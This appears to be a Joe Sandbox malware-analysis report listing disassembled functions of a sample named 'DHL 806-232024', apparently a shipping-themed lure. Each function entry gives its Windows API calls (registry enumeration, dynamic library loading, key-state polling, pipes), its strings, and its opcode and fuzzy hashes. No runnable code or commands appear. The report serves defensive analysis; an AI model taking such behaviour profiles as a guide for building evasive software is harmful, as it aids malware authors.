Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: f918870e64e84d672d8a4eb49c1ace523641ea1791b9f294d24ad3e7e4a18d17
Instruction ID: ac0d7e7e0d1589450799e11f5238e95a6be509503740e0eb02d60521e94cd314
Opcode Fuzzy Hash: f918870e64e84d672d8a4eb49c1ace523641ea1791b9f294d24ad3e7e4a18d17
Instruction Fuzzy Hash: 0F21CAB1604308BFEB119F219CD5EBF76ECEB89B58F10012AF905A7240EB249D44A7A1

Function 00956656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 008D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008D1D73
Part of subcall function 008D1D35: GetStockObject.GDI32(00000011), ref: 008D1D87
Part of subcall function 008D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008D1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009566D0
LoadLibraryW.KERNEL32(?), ref: 009566D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009566EC
DestroyWindow.USER32(?), ref: 009566F4

Strings

SysAnimate32, xrefs: 009566AB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 4d2828c8f78219101159d3e4d1fe664f717d779989b73727d28e864163592699
Instruction ID: 23902a479bde9961816dfcba1cafff86f2600363d7559d349c77aa7de9046b5d
Opcode Fuzzy Hash: 4d2828c8f78219101159d3e4d1fe664f717d779989b73727d28e864163592699
Instruction Fuzzy Hash: C721BE71100205ABEF108E6AEC90EAB77ADEB5937AF900629FD1093190C771CC45A760

Function 0093703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 0093705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00937091
GetStdHandle.KERNEL32(0000000C), ref: 009370A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009370DD

Strings

nul, xrefs: 009370D8

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 0ae7e64425638d4e18ef81c2de8ce43bdef47caaaf71836a713486cce1fadbd7
Instruction ID: 1e0d55557bb864c7b9efcdb201e05d1daedda35dc56351a769eda7401a3c461a
Opcode Fuzzy Hash: 0ae7e64425638d4e18ef81c2de8ce43bdef47caaaf71836a713486cce1fadbd7
Instruction Fuzzy Hash: C4215EB4508309ABDB349FB9DC05A9AB7A8AF84720F208A19FCA1D72D0E77098509F50

Function 0093710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0093712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0093715D
GetStdHandle.KERNEL32(000000F6), ref: 0093716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009371A8

Strings

nul, xrefs: 009371A3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 044ecd815acb7e44fd9c4d5e2d7606af79873452cd8305071f26068bbd363b1f
Instruction ID: 3282a5c7224a14a5f94ef7759eb55df171a5bd57dbad5da89f4cab2e521edb05
Opcode Fuzzy Hash: 044ecd815acb7e44fd9c4d5e2d7606af79873452cd8305071f26068bbd363b1f
Instruction Fuzzy Hash: 7A215EB650C309ABDB309FE99C04AAAB7A8AF55730F204A19F9A1D72D0D77098418F61

Function 0093AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0093AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0093AF13
__swprintf.LIBCMT ref: 0093AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,0095F910), ref: 0093AF6A

Strings

%lu, xrefs: 0093AF26

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 6cce2733b04d874708e37687d6c7aa5d80e35dce664bd4585b3db028ab257f0b
Instruction ID: e9b2810ccc84b56ed67b4fb9200802c2409aeb3e357056054bb2dcad93176af3
Opcode Fuzzy Hash: 6cce2733b04d874708e37687d6c7aa5d80e35dce664bd4585b3db028ab257f0b
Instruction Fuzzy Hash: F7216230600209AFCB10EF65C885EAE7BB8FF89714F004069F945DB351DB31EA41DB61

Function 0092A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

Part of subcall function 0092A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092A399
Part of subcall function 0092A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0092A3AC
Part of subcall function 0092A37C: GetCurrentThreadId.KERNEL32 ref: 0092A3B3
Part of subcall function 0092A37C: AttachThreadInput.USER32(00000000), ref: 0092A3BA

GetFocus.USER32 ref: 0092A554

Part of subcall function 0092A3C5: GetParent.USER32(?), ref: 0092A3D3

GetClassNameW.USER32(?,?,00000100), ref: 0092A59D
EnumChildWindows.USER32(?,0092A615), ref: 0092A5C5
__swprintf.LIBCMT ref: 0092A5DF

Strings

%s%d, xrefs: 0092A5D9

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 4d14e3163f31924aa4492541247c5ff27206ca42999ae1002ce1e99c8265801a
Instruction ID: c647ea0dad858d9fb9d8bac10321d9953a060e68d5d290c85e4c2bf158f3586a
Opcode Fuzzy Hash: 4d14e3163f31924aa4492541247c5ff27206ca42999ae1002ce1e99c8265801a
Instruction Fuzzy Hash: BA11DF72204218ABDF10BF64EC85FEA377DEF88310F0440B6B908AA19ADB7459458B36

Function 00932017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00932048

Strings

APPEND, xrefs: 00932081
KEYS, xrefs: 0093205F
EXISTS, xrefs: 00932070
REMOVE, xrefs: 0093204E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 4ed4dcbf88ef53b227b11285972d510a1f8f15a128a272a86746e29ef97411a4
Instruction ID: 201d8669a9bd9e12d6e4df284ae95ea1e1a17200e83fc962b93b6f49050dffab
Opcode Fuzzy Hash: 4ed4dcbf88ef53b227b11285972d510a1f8f15a128a272a86746e29ef97411a4
Instruction Fuzzy Hash: 601179309042098FCF24EFA8D8904BEB3B5FF16300F10896AD851A7362EB36690ACF51

Function 0094EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0094EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0094EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0094F07E
CloseHandle.KERNEL32(?), ref: 0094F0FF

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: d9aeb0b668fa41c08907052901e40be85100a824e394705be0d40a926deb8cd0
Instruction ID: 467aadc1ec105f4c55ad972a96e7999fbf47fee9379c90db78c913f08114a26b
Opcode Fuzzy Hash: d9aeb0b668fa41c08907052901e40be85100a824e394705be0d40a926deb8cd0
Instruction Fuzzy Hash: 1D813D716043119FD720EF29C856F2AB7E5FF88720F14895EF595DB392DA70AC408B52

Function 008F564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 008F56AB
_memcpy_s.LIBCMT ref: 008F571D
__read_nolock.LIBCMT ref: 008F577B
__filbuf.LIBCMT ref: 008F579E
_memset.LIBCMT ref: 008F57E2

Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
Instruction ID: bdb2862f83c6b5eacb373f09f0aaa778903c3b0d64c1cedab98b821125e2928f
Opcode Fuzzy Hash: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
Instruction Fuzzy Hash: 09519C30A00B0DDBDB24AEB9888467EB7A5FF50324F648629FB35D62D0DB749E518B50

Function 009502C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Part of subcall function 009510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009503C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0095040E
RegCloseKey.ADVAPI32(?,?), ref: 0095043A
RegCloseKey.ADVAPI32(00000000), ref: 00950447

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 08222471ca3b9b7bf86b1c4e04b59ad19d0d6889c627d23e7ebcc684a13a8a02
Instruction ID: 09bab635fd8702d38f21ab8932a77ec96eb4e1f64d772ea21dbdf5cbe180f17d
Opcode Fuzzy Hash: 08222471ca3b9b7bf86b1c4e04b59ad19d0d6889c627d23e7ebcc684a13a8a02
Instruction Fuzzy Hash: 42514E31108204AFD704EF69D891F6EB7E8FF84315F04891EF995872A1DB31E908DB52

Function 0094DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0094DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 0094DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 0094DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 0094DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0094DD35

Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00937B20,?,?,00000000), ref: 008D5B8C
Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00937B20,?,?,00000000,?,?), ref: 008D5BB0

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 880ff486219500fdc9ac7cda604ea12aa912d2fb864d44906db23928b4bb4c40
Instruction ID: 611be3238d34781e0345b547301e0541dacc5d54cef7a411ecedcae1a353ae3a
Opcode Fuzzy Hash: 880ff486219500fdc9ac7cda604ea12aa912d2fb864d44906db23928b4bb4c40
Instruction Fuzzy Hash: 4F512839A04605EFCB00EF68C494DADB7F4FF49321B04816AE855AB351DB30AD45CB91

Function 0093E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0093E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0093E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0093E8F2

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0093E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0093E91F

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 6deb3c979c841cc17996aee58b86825037f411f6f753ae4d4e9652ad9e41f036
Instruction ID: 5dcbc9edcc68c3844fd12bb3ff1b5750064024c74d53806eef89cae91e3a0db9
Opcode Fuzzy Hash: 6deb3c979c841cc17996aee58b86825037f411f6f753ae4d4e9652ad9e41f036
Instruction Fuzzy Hash: FC510935A00215EFCB01EF69C991AAEBBF5FF08310F1480A9E849AB361DB31AD51DF51

Function 0095A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71bfaf0f0f3b2c27485b0496cd987908e2c8857dfebeebb6128914124b5c8c96
Instruction ID: d5845f388459736b7d8fe1652fdd5377d732c942b428882e6ae93eca7f30b005
Opcode Fuzzy Hash: 71bfaf0f0f3b2c27485b0496cd987908e2c8857dfebeebb6128914124b5c8c96
Instruction Fuzzy Hash: FD410135904204AFC720DF6ACC58FA9BBA8FB09326F140365FC55A72E0D770AE49DB59

Function 008D2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 008D2357
ScreenToClient.USER32(009967B0,?), ref: 008D2374
GetAsyncKeyState.USER32(00000001), ref: 008D2399
GetAsyncKeyState.USER32(00000002), ref: 008D23A7

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 479d0b78e1ad051b8e2e75c613acd7681a1c4d5f626c683cdcb3f4f0884f1e98
Instruction ID: c07e74e3ee606e593a58441710734f1992d2201dddba65fb887b50e0526ce138
Opcode Fuzzy Hash: 479d0b78e1ad051b8e2e75c613acd7681a1c4d5f626c683cdcb3f4f0884f1e98
Instruction Fuzzy Hash: 10417C75508219FFDB199F69C844AEABB74FB45360F20435AF828E23A0C734A994DB91

Function 00926920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092695D
TranslateAcceleratorW.USER32(?,?,?), ref: 009269A9
TranslateMessage.USER32(?), ref: 009269D2
DispatchMessageW.USER32(?), ref: 009269DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009269EB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 12b012e6b968601877977ced2b985863cb0de75387f986c2f0f912a487b389fe
Instruction ID: 1acbef16926005580111ac9a2205c5fb25590bcb3d91f4555bb69ac2f4ae06ab
Opcode Fuzzy Hash: 12b012e6b968601877977ced2b985863cb0de75387f986c2f0f912a487b389fe
Instruction Fuzzy Hash: 89313931919326AFDB20CF79EC84FB67BACAB01310F14456AE421D38A4DB34D8C9E790

Function 00928F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00928F12
PostMessageW.USER32(?,00000201,00000001), ref: 00928FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00928FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00928FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00928FDA

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: beff1b03b2a0516174f3269eca9c3c8ddd02678ea1f8fbe9022df4705a6bcfc9
Instruction ID: fe005f2f5813a26915d564289b2dcbbb40ba874b726d555a3575b40e4c1f33ba
Opcode Fuzzy Hash: beff1b03b2a0516174f3269eca9c3c8ddd02678ea1f8fbe9022df4705a6bcfc9
Instruction Fuzzy Hash: C231EE71505229EFDB00CF68EA4CADF7BBAEB04326F104229F924EB1D4C7B09914DB90

Function 0092B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0092B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0092B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0092B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0092B742
_wcsstr.LIBCMT ref: 0092B74C

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: ddf581415ef4ee46d19d0acccd525a542477308e7a980627d4b25aaeb68ead8c
Instruction ID: 356487c47d4dc5b8082f5676ed65c9e28179809df8dcac9dd8a95fcfe14de290
Opcode Fuzzy Hash: ddf581415ef4ee46d19d0acccd525a542477308e7a980627d4b25aaeb68ead8c
Instruction Fuzzy Hash: 9121F932205258BBEB255B39AC49E7B7BECEF85721F104039FD05CA1A5EF61DC409761

Function 0095B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

GetWindowLongW.USER32(?,000000F0), ref: 0095B44C
